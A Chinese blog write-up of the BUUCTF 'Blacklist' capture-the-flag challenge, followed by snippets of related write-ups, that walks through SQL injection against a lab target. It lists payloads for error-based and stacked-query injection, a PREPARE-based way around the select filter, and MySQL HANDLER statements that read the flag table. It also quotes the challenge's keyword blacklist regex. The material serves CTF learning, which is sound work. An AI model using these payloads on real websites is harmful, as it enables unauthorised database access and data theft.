buuctf-Blacklist

最新推荐文章于 2025-04-16 14:52:51 发布
原创 最新推荐文章于 2025-04-16 14:52:51 发布 · 725 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文通过一个具体的案例展示了如何利用SQL注入漏洞获取敏感信息。详细介绍了使用不同类型的SQL注入技术,包括报错注入、堆叠注入等手段来探索数据库结构,并最终获取目标表中的flag数据。 
?inject=1' order by 2--+

过滤了很多关键词,就有select,好像绕不过

试试报错注入

?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+

数据库:surpersqli 

 因为过滤了太多,报错注入不了,只能试试别的了

堆叠注入

?inject=-1';use supersqli;show tables--+

查出两个表:FlagHere,words 

 接下来查字段:flag,varchar(100),NO

?inject=-1';use supersqli;show columns from FlagHere--+

 然后也可以继续用堆叠注入,对select进行拼接就行,但是我有点不大会,大概就像下面这样的

1';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#

还可以用handler读取(知道表名的前提下)

?inject=1';handler FlagHere open;handler  FlagHere read first--+


?inject=1';handler FlagHere open hh;handler hh read first--+


?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;


//三个都可以,1也可以换成-1
m0_62094846
关注
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 944
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 887
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
buuctf-[GYCTF2020]Blacklist sql堆叠注入
2202_75317918的博客
10-02 258
这题我一开始还以为是rce,但是看到注入框内写了1,那就肯定是sql。这里我想起了之前做的强网杯的随便住,也是被过滤了,然后使用的堆叠注入。语句访问,该表对象未被其他会话共享,并且在会话调用。可以通过指定的索引去访问数据。后面不晓得了,才知道有handler语句。表中,读取第一个索引记录,然后关闭。语句打开一个表,使其可以使用后续。1' 报错,更加确定是sql。发现select被过滤了。或会话终止之前不会关闭。
BUUCTF-Blacklist
m0_47571887的博客
11-10 779
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
buuctf blacklist
ANYOUZHEN的博客
05-26 394
这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1' 使用联合查询,构造payload: ?inject=1' union select 1,2--+ 过滤了许多东西: /set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i 其中的select被过滤掉了 尝试使用报错注入进行突破: ?inject=1' and extractvalue(1,concat(0x7e,(databa..
BUUCTF-Real-[PHPMYADMIN]CVE-2018-12613
分享
02-04 1322
CVE-2018-12613漏洞复现!
BUUCTF-[MRCTF2020]Ezaudit 1
dian的博客
11-10 758
不知道为什么这个脚本算出来的私钥一直都是假的私钥,找了好久也没有找到一个能够正确算出私钥的脚本,这个脚本也是源码里面给的,可能是种子不对吧,尝试过逆推种子,但是计算量太大,逆推不出来,找官方的wp也没有找到。不知道为什么这个脚本算出来的私钥一直都是假的私钥,找了好久也没有找到一个能够正确算出私钥的脚本,这个脚本也是源码里面给的,可能是种子不对吧,尝试过逆推种子,但是计算量太大,逆推不出来,找官方的wp也没有找到。访问解压得到index.php,打开就是源码访问解压得到index.php,打开就是源码。
BUUCTF-web刷题篇(20)
m0_65853019的博客
04-11 1014
这段SQL代码片段看起来像是针对MySQL数据库的SQL注入攻击尝试,它利用了MySQL特定的句法特性(如HANDLER语句)来尝试获取或操作名为FlagHere的表的数据。HANDLER FlagHere READ FIRST:紧接着,READ FIRST 指定尝试从已打开的FlagHere表中读取第一条记录。到了这一步,可以直接查看flag了,但是查询的时候出现了过滤字符,命令为2';
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1766
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
buuctf:blacklistp
fcz___的博客
03-29 227
所以我们payload:?inject=1’;可以看到有一个flag字段。但是select被过滤了。我们用handler读取。再知道表名是,可以用handler读取数据。往下的话就不能用sqlmap了因为有waf,我不会绕,我们手工注入。可以看到应该是sql注入。我们用sqlmap扫描一下。已经知道数据库了,我们采用堆叠注入。可以看到存在注入点。
BUUCTF:[GYCTF2020]Blacklist
末初 · mochu7
11-09 638
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
Buuctf [GYCTF2020]Blacklist
qq_53030229的博客
10-26 482
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、检查源码2、使用堆叠注入1、判断是否存在注入点2、使用堆叠注入3、获取flag 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER
buuctf[GYCTF2020]Blacklist
qq_75005708的博客
04-25 268
如果使用别名打开表,使用其他 HANDLER 语句对打开的表的进一步引用必须使用别名,而不是表名。如果不使用别名,但使用由数据库名称限定的表名打开表,则进一步的引用必须使用不限定的表名。例如,使用 mydb.mytable 打开的表,进一步引用必须使用 mytable。和输入1的时候是一样的,看了wp之后发现其他的方法,运用HANDLER 语句。open是打开,read是开始读取的意思,close是结束的意思。是有一个1,我们查询之后会发现出现以上页面,我们再试一下1'然后我们就可以拿到我们的答案了。
buuctf [GYCTF2020]Blacklist
m0_63883187的博客
01-14 193
不懂得欢迎私信交流
WEB-buuctf-black list
weixin_52804141的博客
01-01 245
buuctf black list
BUUCTF[GYCTF2020]Blacklist
weixin_45253622的博客
05-22 474
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过。 可用的还有,or and unionshow 输入:1 or 1=1 无反应 输入:1' or '1' ='1如下: 字符型注入,由于show可用,所以我们想到堆叠注入: 1';show tables; 查看字段名, 1';show columns from FlagHere; 过滤机制过于强大,所以我们使用handler, HANDLER...OPEN语句打开一个表,使其可以使用...
BUUCTF [GYCTF2020]Blacklist1
最新发布
duchuan_的博客
04-16 536
初始页面。
BUUCTF---web---[GYCTF2020]Blacklist
2201_75556700的博客
06-11 470
7、查看flag字段中的信息,select被过滤了。8、使用handler打开表,并读取表中第一个信息。2、测试单引号和双引号,单引号报错,双引号没报错。4、使用堆叠注入测试,查看数据库名。6、查看FlagHere中字段名。1、来到题目连接页面。
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 2071
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
Ultimate-Hosts-Blacklist项目部署启动器使用指南
在标题中提到的`ultimate-hosts-blacklist-deployment-launcher`是一个Python程序,通常通过Python的包管理工具pip进行安装。描述中给出了安装命令示例: ``` $ pip3 install --user ultimate-hosts-blacklist-...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值